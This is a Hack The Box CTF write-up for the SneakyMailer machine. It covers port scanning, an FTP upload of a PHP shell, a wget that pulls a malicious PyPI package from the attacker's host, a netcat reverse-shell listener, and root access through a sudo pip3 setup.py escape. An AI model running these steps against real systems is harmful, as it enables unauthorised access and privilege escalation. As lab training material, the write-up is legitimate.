Hackthebox — SneakyMailer

Summary

Today we have another linux machine is retired with IP 10.10.10.197

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.197
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-12 17:40 EET
Nmap scan report for 10.10.10.197
Host is up (0.11s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp open imap Courier Imapd (released 2018)
|_imap-capabilities: STARTTLS NAMESPACE UTF8=ACCEPTA0001 UIDPLUS ENABLE ACL IDLE THREAD=REFERENCES ACL2=UNION THREAD=ORDEREDSUBJECT completed IMAP4rev1 CAPABILITY OK SORT CHILDREN QUOTA
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: NAMESPACE UTF8=ACCEPTA0001 UIDPLUS AUTH=PLAIN ACL IDLE THREAD=REFERENCES ACL2=UNION THREAD=ORDEREDSUBJECT completed CAPABILITY IMAP4rev1 OK ENABLE SORT CHILDREN QUOTA
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.70 seconds
root@strike:~#

We have many ports open for linux machine!

Web

I found page team.php

I tried to Connect to ftp service with developer credentials and upload secwalk.php file to dev directory

root@strike:~# ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd dev
250 Directory successfully changed.
ftp> mput secwalk.php
mput secwalk.php? yes
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5490 bytes sent in 0.00 secs (54.5382 MB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 May 26 19:52 css
drwxr-xr-x 2 0 0 4096 May 26 19:52 img
-rwxr-xr-x 1 0 0 13742 Jun 23 09:44 index.php
drwxr-xr-x 3 0 0 4096 May 26 19:52 js
drwxr-xr-x 2 0 0 4096 May 26 19:52 pypi
drwxr-xr-x 4 0 0 4096 May 26 19:52 scss
--wxrw-rw- 1 1001 1001 5490 Jul 16 10:40 secwalk.php
-rwxr-xr-x 1 0 0 26523 May 26 20:58 team.php
drwxr-xr-x 8 0 0 4096 May 26 19:52 vendor
226 Directory send OK.
ftp>

Open the file in browser
Listening on port 4142 to get connection

After create two files on our Desktop, We need to upload this files to the machine

developer@sneakymailer:/tmp$ wget -r --no-parent http://10.10.15.33:8000/pypi-pkg
<get -r --no-parent http://10.10.15.33:8000/pypi-pkg
--2020-07-16 10:42:48-- http://10.10.15.33:8000/pypi-pkg
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: /pypi-pkg/ [following]
--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 266 [text/html]
Saving to: ‘10.10.15.33:8000/pypi-pkg’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 266 --.-KB/s in 0s

2020-07-16 10:42:49 (6.19 MB/s) - ‘10.10.15.33:8000/pypi-pkg’ saved [266/266]

Loading robots.txt; please ignore errors.
--2020-07-16 10:42:49-- http://10.10.15.33:8000/robots.txt
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 404 File not found
2020-07-16 10:42:49 ERROR 404: File not found.

--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/.pypirc
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 128 [application/octet-stream]
Saving to: ‘10.10.15.33:8000/pypi-pkg/.pypirc’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 128 --.-KB/s in 0s

2020-07-16 10:42:49 (3.21 MB/s) - ‘10.10.15.33:8000/pypi-pkg/.pypirc’ saved [128/128]

--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/setup.py
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [text/plain]
Saving to: ‘10.10.15.33:8000/pypi-pkg/setup.py’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 565 --.-KB/s in 0s

2020-07-16 10:42:49 (14.4 MB/s) - ‘10.10.15.33:8000/pypi-pkg/setup.py’ saved [565/565]

FINISHED --2020-07-16 10:42:49--
Total wall clock time: 1.0s
Downloaded: 3 files, 959 in 0s (7.86 MB/s)

There is the files

developer@sneakymailer:/tmp$ ls
ls
10.10.15.33:8000
systemd-private-859f3cb0b4ff454aab770ad4a719628d-systemd-timesyncd.service-CZ3mlI
vmware-root_458-834774610
developer@sneakymailer:/tmp$ cd 10.10.15.33:8000
cd 10.10.15.33:8000
developer@sneakymailer:/tmp/10.10.15.33:8000$ ls
ls
pypi-pkg
developer@sneakymailer:/tmp/10.10.15.33:8000$ cd pypi-pkg
cd pypi-pkg
developer@sneakymailer:/tmp/10.10.15.33:8000/pypi-pkg$ ls -a
ls -a
. .. setup.py .pypirc

We need to listen to port 2345 to get low privilege

root@strike:~# nc -lnvp 2345
listening on [any] 2345 ...

Now we need to execute the package

And we got the shell

Gain user flag!

Privilege Escalation

low@sneakymailer:~$ sudo -l
sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3
low@sneakymailer:~$

After searching i found blog to abuse the pip3
Link

low@sneakymailer:~$ TF=$(mktemp -d)
TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo pip3 install $TF
sudo pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.tQid5dJuNf
# bash
root@sneakymailer:/tmp/pip-req-build-9k8kjhct#

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

Thx for ur time!

--

--

--

CTFer | Computer Science Student

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Google Summer of Code ’20 with Oppia

Oppia Mascot

Deploy Wordpress GCP using GKE and Cloud SQL

My take on Model View Intent (MVI) — Part 1: State Renderer

ASQ Software Division’s ICSQ 2009 Conference Notes

Freshworks + Swedbyte: Growing Together on the Freshworks Platform

How to Optimize Flutter Web and How Flutter Web work in Html Renderer

Software Due Diligence — Focus on Contributors and Their Cooperation

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student

More from Medium

TryHackMe: 0x41haz Room Write-Up [No Answer]

Auth0 CTF write-up

Throwback — Part 2 — Mail Server

FORGE — HackTheBox WriteUp